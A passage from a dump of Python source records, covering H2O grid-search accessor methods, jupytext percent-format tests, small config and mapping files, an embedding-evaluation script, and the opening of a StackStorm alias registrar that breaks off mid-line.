\"\"\"Return the list of cross-validated models.\"\"\"\n return {model.model_id: model.xvals for model in self.models}\n\n\n def deepfeatures(self, test_data, layer):\n \"\"\"\n Obtain a hidden layer's details on a dataset.\n\n :param test_data: Data to create a feature space on.\n :param int layer: Index of the hidden layer.\n :returns: A dictionary of hidden layer details for each model.\n \"\"\"\n return {model.model_id: model.deepfeatures(test_data, layer) for model in self.models}\n\n\n def weights(self, matrix_id=0):\n \"\"\"\n Return the frame for the respective weight matrix.\n\n :param: matrix_id: an integer, ranging from 0 to number of layers, that specifies the weight matrix to return.\n :returns: an H2OFrame which represents the weight matrix identified by matrix_id\n \"\"\"\n return {model.model_id: model.weights(matrix_id) for model in self.models}\n\n\n def biases(self, vector_id=0):\n \"\"\"\n Return the frame for the respective bias vector.\n\n :param: vector_id: an integer, ranging from 0 to number of layers, that specifies the bias vector to return.\n :returns: an H2OFrame which represents the bias vector identified by vector_id\n \"\"\"\n return {model.model_id: model.biases(vector_id) for model in self.models}\n\n\n def normmul(self):\n \"\"\"Normalization/Standardization multipliers for numeric predictors.\"\"\"\n return {model.model_id: model.normmul() for model in self.models}\n\n\n def normsub(self):\n \"\"\"Normalization/Standardization offsets for numeric predictors.\"\"\"\n return {model.model_id: model.normsub() for model in self.models}\n\n\n def respmul(self):\n \"\"\"Normalization/Standardization multipliers for numeric response.\"\"\"\n return {model.model_id: model.respmul() for model in self.models}\n\n\n def respsub(self):\n \"\"\"Normalization/Standardization offsets for numeric response.\"\"\"\n return {model.model_id: model.respsub() for model in self.models}\n\n\n def catoffsets(self):\n \"\"\"\n Categorical offsets for one-hot encoding\n \"\"\"\n return {model.model_id: model.catoffsets() for model in self.models}\n\n\n def model_performance(self, test_data=None, train=False, valid=False, xval=False):\n \"\"\"\n Generate model metrics for this model on test_data.\n\n :param test_data: Data set for which model metrics shall be computed against. All three of train, valid\n and xval arguments are ignored if test_data is not None.\n :param train: Report the training metrics for the model.\n :param valid: Report the validation metrics for the model.\n :param xval: Report the validation metrics for the model.\n :return: An object of class H2OModelMetrics.\n \"\"\"\n return {model.model_id: model.model_performance(test_data, train, valid, xval) for model in self.models}\n\n\n def scoring_history(self):\n \"\"\"\n Retrieve model scoring history.\n\n :returns: Score history (H2OTwoDimTable)\n \"\"\"\n return {model.model_id: model.scoring_history() for model in self.models}\n\n\n def summary(self, header=True):\n \"\"\"Print a detailed summary of the explored models.\"\"\"\n table = []\n for model in self.models:\n model_summary = model._model_json[\"output\"][\"model_summary\"]\n r_values = list(model_summary.cell_values[0])\n r_values[0] = model.model_id\n table.append(r_values)\n\n # if h2o.can_use_pandas():\n # import pandas\n # pandas.options.display.max_rows = 20\n # print pandas.DataFrame(table,columns=self.col_header)\n # return\n print()\n if header:\n print('Grid Summary:')\n print()\n H2ODisplay(table, header=['Model Id'] + model_summary.col_header[1:], numalign=\"left\", stralign=\"left\")\n\n\n def show(self):\n \"\"\"Print models sorted by metric.\"\"\"\n hyper_combos = itertools.product(*list(self.hyper_params.values()))\n if not self.models:\n c_values = [[idx + 1, list(val)] for idx, val in enumerate(hyper_combos)]\n print(H2OTwoDimTable(\n col_header=['Model', 'Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']'],\n table_header='Grid Search of Model ' + self.model.__class__.__name__, cell_values=c_values))\n else:\n print(self.sorted_metric_table())\n\n\n def varimp(self, use_pandas=False):\n \"\"\"\n Pretty print the variable importances, or return them in a list/pandas DataFrame.\n\n :param bool use_pandas: If True, then the variable importances will be returned as a pandas data frame.\n\n :returns: A dictionary of lists or Pandas DataFrame instances.\n \"\"\"\n return {model.model_id: model.varimp(use_pandas) for model in self.models}\n\n\n def residual_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the residual deviance if this model has the attribute, or None otherwise.\n\n :param bool train: Get the residual deviance for the training set. If both train and valid are False,\n then train is selected by default.\n :param bool valid: Get the residual deviance for the validation set. If both train and valid are True,\n then train is selected by default.\n :param bool xval: Get the residual deviance for the cross-validated models.\n\n :returns: the residual deviance, or None if it is not present.\n \"\"\"\n return {model.model_id: model.residual_deviance(train, valid, xval) for model in self.models}\n\n\n def residual_degrees_of_freedom(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the residual degress of freedom if this model has the attribute, or None otherwise.\n\n :param bool train: Get the residual dof for the training set. If both train and valid are False, then\n train is selected by default.\n :param bool valid: Get the residual dof for the validation set. If both train and valid are True, then\n train is selected by default.\n :param bool xval: Get the residual dof for the cross-validated models.\n\n :returns: the residual degrees of freedom, or None if they are not present.\n \"\"\"\n return {model.model_id: model.residual_degrees_of_freedom(train, valid, xval) for model in self.models}\n\n\n def null_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the null deviance if this model has the attribute, or None otherwise.\n\n :param bool train: Get the null deviance for the training set. If both train and valid are False, then\n train is selected by default.\n :param bool valid: Get the null deviance for the validation set. If both train and valid are True, then\n train is selected by default.\n :param bool xval: Get the null deviance for the cross-validated models.\n\n :returns: the null deviance, or None if it is not present.\n \"\"\"\n return {model.model_id: model.null_deviance(train, valid, xval) for model in self.models}\n\n\n def null_degrees_of_freedom(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the null degress of freedom if this model has the attribute, or None otherwise.\n\n :param bool train: Get the null dof for the training set. If both train and valid are False, then train is\n selected by default.\n :param bool valid: Get the null dof for the validation set. If both train and valid are True, then train is\n selected by default.\n :param bool xval: Get the null dof for the cross-validated models.\n\n :returns: the null dof, or None if it is not present.\n \"\"\"\n return {model.model_id: model.null_degrees_of_freedom(train, valid, xval) for model in self.models}\n\n\n def pprint_coef(self):\n \"\"\"Pretty print the coefficents table (includes normalized coefficients).\"\"\"\n for i, model in enumerate(self.models):\n print('Model', i)\n model.pprint_coef()\n print()\n\n\n def coef(self):\n \"\"\"Return the coefficients that can be applied to the non-standardized data.\n\n Note: standardize = True by default. If set to False, then coef() returns the coefficients that are fit directly.\n\n \"\"\"\n return {model.model_id: model.coef() for model in self.models}\n\n\n def coef_norm(self):\n \"\"\"Return coefficients fitted on the standardized data (requires standardize = True, which is on by default). These coefficients can be used to evaluate variable importance.\n\n \"\"\"\n return {model.model_id: model.coef_norm() for model in self.models}\n\n\n def r2(self, train=False, valid=False, xval=False):\n \"\"\"\n Return the R^2 for this regression model.\n\n The R^2 value is defined to be ``1 - MSE/var``, where ``var`` is computed as ``sigma^2``.\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the R^2 value for the training data.\n :param bool valid: If valid is True, then return the R^2 value for the validation data.\n :param bool xval: If xval is True, then return the R^2 value for the cross validation data.\n\n :returns: The R^2 for this regression model.\n \"\"\"\n return {model.model_id: model.r2(train, valid, xval) for model in self.models}\n\n\n def mse(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the MSE(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the MSE value for the training data.\n :param bool valid: If valid is True, then return the MSE value for the validation data.\n :param bool xval: If xval is True, then return the MSE value for the cross validation data.\n :returns: The MSE for this regression model.\n \"\"\"\n return {model.model_id: model.mse(train, valid, xval) for model in self.models}\n\n\n def logloss(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Log Loss(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Log Loss value for the training data.\n :param bool valid: If valid is True, then return the Log Loss value for the validation data.\n :param bool xval: If xval is True, then return the Log Loss value for the cross validation data.\n\n :returns: The Log Loss for this binomial model.\n \"\"\"\n return {model.model_id: model.logloss(train, valid, xval) for model in self.models}\n\n\n def mean_residual_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Mean Residual Deviances(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Mean Residual Deviance value for the training data.\n :param bool valid: If valid is True, then return the Mean Residual Deviance value for the validation data.\n :param bool xval: If xval is True, then return the Mean Residual Deviance value for the cross validation data.\n :returns: The Mean Residual Deviance for this regression model.\n \"\"\"\n return {model.model_id: model.mean_residual_deviance(train, valid, xval) for model in self.models}\n\n\n def auc(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the AUC(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the AUC value for the training data.\n :param bool valid: If valid is True, then return the AUC value for the validation data.\n :param bool xval: If xval is True, then return the AUC value for the validation data.\n\n :returns: The AUC.\n \"\"\"\n return {model.model_id: model.auc(train, valid, xval) for model in self.models}\n\n\n def aic(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the AIC(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the AIC value for the training data.\n :param bool valid: If valid is True, then return the AIC value for the validation data.\n :param bool xval: If xval is True, then return the AIC value for the validation data.\n\n :returns: The AIC.\n \"\"\"\n return {model.model_id: model.aic(train, valid, xval) for model in self.models}\n\n\n def gini(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Gini Coefficient(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Gini Coefficient value for the training data.\n :param bool valid: If valid is True, then return the Gini Coefficient value for the validation data.\n :param bool xval: If xval is True, then return the Gini Coefficient value for the cross validation data.\n\n :returns: The Gini Coefficient for this binomial model.\n \"\"\"\n return {model.model_id: model.gini(train, valid, xval) for model in self.models}\n\n\n def get_hyperparams(self, id, display=True):\n \"\"\"\n Get the hyperparameters of a model explored by grid search.\n\n :param str id: The model id of the model with hyperparameters of interest.\n :param bool display: Flag to indicate whether to display the hyperparameter names.\n\n :returns: A list of the hyperparameters for the specified model.\n \"\"\"\n idx = id if is_type(id, int) else self.model_ids.index(id)\n model = self[idx]\n\n # if cross-validation is turned on, parameters in one of the fold model actuall contains the max_runtime_secs\n # parameter and not the main model that is returned.\n if model._is_xvalidated:\n model = h2o.get_model(model._xval_keys[0])\n\n res = [model.params[h]['actual'][0] if isinstance(model.params[h]['actual'], list)\n else model.params[h]['actual']\n for h in self.hyper_params]\n if display: print('Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']')\n return res\n\n\n def get_hyperparams_dict(self, id, display=True):\n \"\"\"\n Derived and returned the model parameters used to train the particular grid search model.\n\n :param str id: The model id of the model with hyperparameters of interest.\n :param bool display: Flag to indicate whether to display the hyperparameter names.\n\n :returns: A dict of model pararmeters derived from the hyper-parameters used to train this particular model.\n \"\"\"\n idx = id if is_type(id, int) else self.model_ids.index(id)\n model = self[idx]\n\n model_params = dict()\n\n # if cross-validation is turned on, parameters in one of the fold model actual contains the max_runtime_secs\n # parameter and not the main model that is returned.\n if model._is_xvalidated:\n model = h2o.get_model(model._xval_keys[0])\n\n for param_name in self.hyper_names:\n model_params[param_name] = model.params[param_name]['actual'][0] if \\\n isinstance(model.params[param_name]['actual'], list) else model.params[param_name]['actual']\n\n if display: print('Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']')\n return model_params\n\n\n def sorted_metric_table(self):\n \"\"\"\n Retrieve summary table of an H2O Grid Search.\n\n :returns: The summary table as an H2OTwoDimTable or a Pandas DataFrame.\n \"\"\"\n summary = self._grid_json[\"summary_table\"]\n if summary is not None: return summary.as_data_frame()\n print(\"No sorted metric table for this grid search\")\n\n\n @staticmethod\n def _metrics_class(model_json):\n model_type = model_json[\"output\"][\"model_category\"]\n if model_type == \"Binomial\":\n model_class = H2OBinomialGridSearch\n elif model_type == \"Clustering\":\n model_class = H2OClusteringGridSearch\n elif model_type == \"Regression\":\n model_class = H2ORegressionGridSearch\n elif model_type == \"Multinomial\":\n model_class = H2OMultinomialGridSearch\n elif model_type == \"Ordinal\":\n model_class = H2OOrdinalGridSearch\n elif model_type == \"AutoEncoder\":\n model_class = H2OAutoEncoderGridSearch\n elif model_type == \"DimReduction\":\n model_class = H2ODimReductionGridSearch\n else:\n raise NotImplementedError(model_type)\n return model_class\n\n\n def get_grid(self, sort_by=None, decreasing=None):\n \"\"\"\n Retrieve an H2OGridSearch instance.\n\n Optionally specify a metric by which to sort models and a sort order.\n Note that if neither cross-validation nor a validation frame is used in the grid search, then the\n training metrics will display in the \"get grid\" output. If a validation frame is passed to the grid, and\n ``nfolds = 0``, then the validation metrics will display. However, if ``nfolds`` > 1, then cross-validation\n metrics will display even if a validation frame is provided.\n\n :param str sort_by: A metric by which to sort the models in the grid space. Choices are: ``\"logloss\"``,\n ``\"residual_deviance\"``, ``\"mse\"``, ``\"auc\"``, ``\"r2\"``, ``\"accuracy\"``, ``\"precision\"``, ``\"recall\"``,\n ``\"f1\"``, etc.\n :param bool decreasing: Sort the models in decreasing order of metric if true, otherwise sort in increasing\n order (default).\n\n :returns: A new H2OGridSearch instance optionally sorted on the specified metric.\n \"\"\"\n if sort_by is None and decreasing is None: return self\n\n grid_json = h2o.api(\"GET /99/Grids/%s\" % self._id, data={\"sort_by\": sort_by, \"decreasing\": decreasing})\n grid = H2OGridSearch(self.model, self.hyper_params, self._id)\n grid.models = [h2o.get_model(key['name']) for key in grid_json['model_ids']] # reordered\n first_model_json = h2o.api(\"GET /99/Models/%s\" % grid_json['model_ids'][0]['name'])['models'][0]\n model_class = H2OGridSearch._metrics_class(first_model_json)\n m = model_class()\n m._id = self._id\n m._grid_json = grid_json\n # m._metrics_class = metrics_class\n m._parms = grid._parms\n H2OEstimator.mixin(grid, model_class)\n grid.__dict__.update(m.__dict__.copy())\n return grid\n\n\n # Deprecated functions; left here for backward compatibility\n _bcim = {\n \"giniCoef\": lambda self, *args, **kwargs: self.gini(*args, **kwargs)\n }\n\n\n @deprecated(\"grid.sort_by() is deprecated; use grid.get_grid() instead\")\n def sort_by(self, metric, increasing=True):\n \"\"\"Deprecated since 2016-12-12, use grid.get_grid() instead.\"\"\"\n\n if metric[-1] != ')': metric += '()'\n c_values = [list(x) for x in zip(*sorted(eval('self.' + metric + '.items()'), key=lambda k_v: k_v[1]))]\n c_values.insert(1, [self.get_hyperparams(model_id, display=False) for model_id in c_values[0]])\n if not increasing:\n for col in c_values: col.reverse()\n if metric[-2] == '(': metric = metric[:-2]\n return H2OTwoDimTable(\n col_header=['Model Id', 'Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']', metric],\n table_header='Grid Search Results for ' + self.model.__class__.__name__,\n cell_values=[list(x) for x in zip(*c_values)])\n"} {"ext": "py", "sha": "1a2fa1bf108cc114e4925cc6529c2d4f8504e65a", "content": "# -*- coding: utf-8 -*-\n\nimport os\nfrom nbformat.v4.nbbase import new_notebook, new_code_cell, new_markdown_cell, new_raw_cell\nfrom jupytext.compare import compare, compare_notebooks\nimport jupytext\n\n\ndef test_read_simple_file(script=\"\"\"# ---\n# title: Simple file\n# ---\n\n# %% [markdown]\n# This is a markdown cell\n\n# %% [md]\n# This is also a markdown cell\n\n# %% [raw]\n# This is a raw cell\n\n# %%% sub-cell title\n# This is a sub-cell\n\n# %%%% sub-sub-cell title\n# This is a sub-sub-cell\n\n# %% And now a code cell\n1 + 2 + 3 + 4\n5\n6\n# %%magic # this is a commented magic, not a cell\n\n7\n\"\"\"):\n nb = jupytext.reads(script, 'py:percent')\n compare_notebooks(new_notebook(cells=[\n new_raw_cell('---\\ntitle: Simple file\\n---'),\n new_markdown_cell('This is a markdown cell'),\n new_markdown_cell('This is also a markdown cell', metadata={'region_name': 'md'}),\n new_raw_cell('This is a raw cell'),\n new_code_cell('# This is a sub-cell', metadata={'title': 'sub-cell title', 'cell_depth': 1}),\n new_code_cell('# This is a sub-sub-cell', metadata={'title': 'sub-sub-cell title', 'cell_depth': 2}),\n new_code_cell('''1 + 2 + 3 + 4\n5\n6\n%%magic # this is a commented magic, not a cell\n\n7''', metadata={'title': 'And now a code cell'})]), nb)\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_read_cell_with_metadata(\n script=\"\"\"# %% a code cell with parameters {\"tags\": [\"parameters\"]}\na = 3\n\"\"\"):\n nb = jupytext.reads(script, 'py:percent')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'code'\n assert nb.cells[0].source == 'a = 3'\n assert nb.cells[0].metadata == {\n 'title': 'a code cell with parameters',\n 'tags': ['parameters']}\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_read_nbconvert_script(script=\"\"\"\n# coding: utf-8\n\n# A markdown cell\n\n# In[1]:\n\n\nimport pandas as pd\n\npd.options.display.max_rows = 6\npd.options.display.max_columns = 20\n\n\n# Another markdown cell\n\n# In[2]:\n\n\n1 + 1\n\n\n# Again, a markdown cell\n\n# In[33]:\n\n\n2 + 2\n\n\n# \n\n\n3 + 3\n\"\"\"):\n assert jupytext.formats.guess_format(script, '.py')[0] == 'percent'\n nb = jupytext.reads(script, '.py')\n assert len(nb.cells) == 5\n\n\ndef test_read_remove_blank_lines(script=\"\"\"# %%\nimport pandas as pd\n\n# %% Display a data frame\ndf = pd.DataFrame({'A': [1, 2], 'B': [3, 4]},\n index=pd.Index(['x0', 'x1'], name='x'))\ndf\n\n# %% Pandas plot {\"tags\": [\"parameters\"]}\ndf.plot(kind='bar')\n\n\n# %% sample class\nclass MyClass:\n pass\n\n\n# %% a function\ndef f(x):\n return 42 * x\n\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n assert len(nb.cells) == 5\n for i in range(5):\n assert nb.cells[i].cell_type == 'code'\n assert not nb.cells[i].source.startswith('\\n')\n assert not nb.cells[i].source.endswith('\\n')\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_no_crash_on_square_bracket(script=\"\"\"# %% In [2]\nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_nbconvert_cell(script=\"\"\"# In[2]:\nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\nprint('Hello')\n\"\"\"\n compare(script2, expected)\n\n\ndef test_nbformat_v3_nbpy_cell(script=\"\"\"# \nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\nprint('Hello')\n\"\"\"\n compare(script2, expected)\n\n\ndef test_multiple_empty_cells():\n nb = new_notebook(cells=[new_code_cell(), new_code_cell(), new_code_cell()],\n metadata={'jupytext': {'notebook_metadata_filter': '-all'}})\n text = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\n\n# %%\n\n# %%\n\"\"\"\n compare(text, expected)\n nb2 = jupytext.reads(text, 'py:percent')\n nb2.metadata = nb.metadata\n compare(nb2, nb)\n\n\ndef test_first_cell_markdown_191():\n text = \"\"\"# %% [markdown]\n# Docstring\n\n# %%\nfrom math import pi\n\n# %% [markdown]\n# Another markdown cell\n\"\"\"\n\n nb = jupytext.reads(text, 'py')\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[1].cell_type == 'code'\n assert nb.cells[2].cell_type == 'markdown'\n\n\ndef test_multiline_comments_in_markdown_1():\n text = \"\"\"# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\"\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"a\\nlong\\ncell\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_in_markdown_2():\n text = '''# %% [markdown]\n\"\"\"\na\nlong\ncell\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"a\\nlong\\ncell\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_format_option():\n text = '''# %% [markdown]\n\"\"\"\na\nlong\ncell\n\"\"\"\n'''\n nb = new_notebook(cells=[new_markdown_cell(\"a\\nlong\\ncell\")],\n metadata={'jupytext': {'cell_markers': '\"\"\"',\n 'notebook_metadata_filter': '-all'}})\n py = jupytext.writes(nb, 'py:percent')\n compare(py, text)\n\n\ndef test_multiline_comments_in_raw_cell():\n text = '''# %% [raw]\n\"\"\"\nsome\ntext\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'raw'\n assert nb.cells[0].source == \"some\\ntext\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_in_markdown_cell_no_line_return():\n text = '''# %% [markdown]\n\"\"\"a\nlong\ncell\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"a\\nlong\\ncell\"\n\n\ndef test_multiline_comments_in_markdown_cell_is_robust_to_additional_cell_marker():\n text = '''# %% [markdown]\n\"\"\"\nsome text, and a fake cell marker\n# %% [raw]\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"some text, and a fake cell marker\\n# %% [raw]\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_cell_markers_option_in_contents_manager(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py:percent',\n 'notebook_metadata_filter': '-all',\n 'cell_markers': \"'''\"}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"# %%\n1 + 1\n\n# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_default_cell_markers_in_contents_manager(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n cm.default_cell_markers = \"'''\"\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py:percent',\n 'notebook_metadata_filter': '-all'}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"# %%\n1 + 1\n\n# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_default_cell_markers_in_contents_manager_does_not_impact_light_format(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n cm.default_cell_markers = \"'''\"\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py',\n 'notebook_metadata_filter': '-all'}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"1 + 1\n\n# a\n# long\n# cell\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_single_triple_quote_works(no_jupytext_version_number, text='''# ---\n# jupyter:\n# jupytext:\n# cell_markers: '\"\"\"'\n# formats: ipynb,py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# ---\n\n# %%\nprint(\"hello\")\n''', notebook=new_notebook(cells=[new_code_cell('print(\"hello\")')])):\n compare_notebooks(jupytext.reads(text, 'py'), notebook)\n\n\ndef test_docstring_with_quadruple_quote(nb=new_notebook(cells=[\n new_code_cell('''def fun_1(df):\n \"\"\"\"\n docstring starting with 4 double quotes and ending with 3\n \"\"\"\n return df'''),\n new_code_cell('''def fun_2(df):\n \"\"\"\n docstring\n \"\"\"\n return df''')\n])):\n \"\"\"Reproduces https://github.com/mwouts/jupytext/issues/460\"\"\"\n py = jupytext.writes(nb, 'py:percent')\n nb2 = jupytext.reads(py, 'py')\n compare_notebooks(nb2, nb)\n"} {"ext": "py", "sha": "1a2fa20ce8699c0d89d64e49ca36b015ea10ffd0", "content": "# Configuration file for the skipper script\n\nintro_duration=60 # Duration in seconds, change this value\n"} {"ext": "py", "sha": "1a2fa219503a17c62a8de6cd825611b4b91aa4eb", "content": "all_item_types = {\n 'cards': 'createCard',\n 'boards': 'createBoard', \n 'lists': 'createList',\n 'comments': 'commentCard',\n 'createChecklist': 'addChecklistToCard', \n 'updateCheck': 'updateCheckItemStateOnCard',\n 'moveCard': 'updateCard'\n}"} {"ext": "py", "sha": "1a2fa29986fe3882f57c423208672f82034bd1e3", "content": "if __name__ == \"__main__\":\n\n import os\n import sys\n\n sys.path.append(os.getcwd() + \"/../../\")\n\n import pandas as pd\n import itertools\n from kge_from_text import folder_definitions as fd\n import kge_from_text.models.term_embeddings as tt\n import kge_from_text.bridges.clean_bridge as bridge\n from kge_from_text.evaluators.evaluator_handler import EvaluatorHandler\n from kge_from_text.evaluators.analogy_evaluator import AnalogyEvaluator\n import kge_from_text.models.tee_embeddings as tee\n\n combinations = [(5, 400), (5, 500)]\n\n\n entity_vector_name = \"2016_data/entity_vectors\"\n type_vector_name = \"2016_data/type_vectors\"\n conactenated_name = \"2016_data/concatenated_vectors\"\n conactenated_name_time = \"2016_data/concatenated_vectors_time\"\n temporal_csv = \"2016_data/temporal_vectors.csv\"\n\n annotated_entity_file = \"2016_data/annotated_text_with_entities\"\n annotated_type_file = \"2016_data/annotated_text_with_types\"\n type_of_entity_file = \"2016_data/type_to_entity_data.ttl\"\n\n pure_text_model = \"2016_data/text_with_words\"\n\n # Declare An Evaluator\n evalu = EvaluatorHandler(fd.EVALUATION_RESULTS_ROOT, name=\"word_base\")\n\n for w_e, s_e in combinations:\n\n # ENTITY\n model_w = tt.TermEmbedding(\"text\")\n model_w.fit(input_text=fd.STARTING_DATA_ROOT + pure_text_model,\n output_file_path=fd.PRODUCED_MODELS_ROOT + \"2016_data/\", _size=s_e, _window=w_e, load_model_if_exits = True)\n\n\n analogies = pd.read_csv(fd.GOLD_STANDARDS + \"mikolov\", names=[\"First\", \"Second\", \"Third\", \"Fourth\"],\n sep=\" \")\n br = bridge.CleanBridge()\n\n analogy_eval = AnalogyEvaluator(br, model_w, analogies)\n\n evalu.run_evaluation(analogy_eval)\n\n analogies = pd.read_csv(fd.GOLD_STANDARDS + \"currency\", names=[\"First\", \"Second\", \"Third\", \"Fourth\"],\n sep=\" \")\n\n analogy_eval = AnalogyEvaluator(br, model_w, analogies)\n\n evalu.run_evaluation(analogy_eval)\n"} {"ext": "py", "sha": "1a2fa2c8737687b828f51c7e64396aca36a6f1fc", "content": "# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport six\n\nimport st2common.content.utils as content_utils\n\nfrom st2common import log as logging\nfrom st2common.constants.meta import ALLOWED_EXTS\nfrom st2common.bootstrap.base import ResourceRegistrar\nfrom st2common.models.api.action import ActionAliasAPI\nfrom st2common.persistence.actionalias import ActionAlias\n\n__all__ = [\n 'AliasesRegistrar',\n 'register_aliases'\n]\n\nLOG = logging.getLogger(__name__)\n\n\nclass AliasesRegistrar(ResourceRegistrar):\n ALLOWED_EXTENSIONS = ALLOWED_EXTS\n\n def register_aliases_from_packs(self, base_dirs):\n \"\"\"\n Discover all the packs in the provided directory and register aliases from all of the\n discovered packs.\n\n :return: Number of aliases registered.\n :rtype: ``int``\n \"\"\"\n registered_count = 0\n\n content = self._pack_loader.get_content(base_dirs=base_dirs,\n content_type='aliases')\n\n for pack, aliases_dir in six.iteritems(content):\n try:\n LOG.debug('Registering aliases from pack %s:, dir: %s', pack, aliases_dir)\n aliases = self._get_aliases_from_pack(aliases_dir)\n count = self._register_aliases_from_pack(pack=pack, aliases=aliases)\n registered_count += count\n except:\n LOG.exception('Failed registering all aliases from 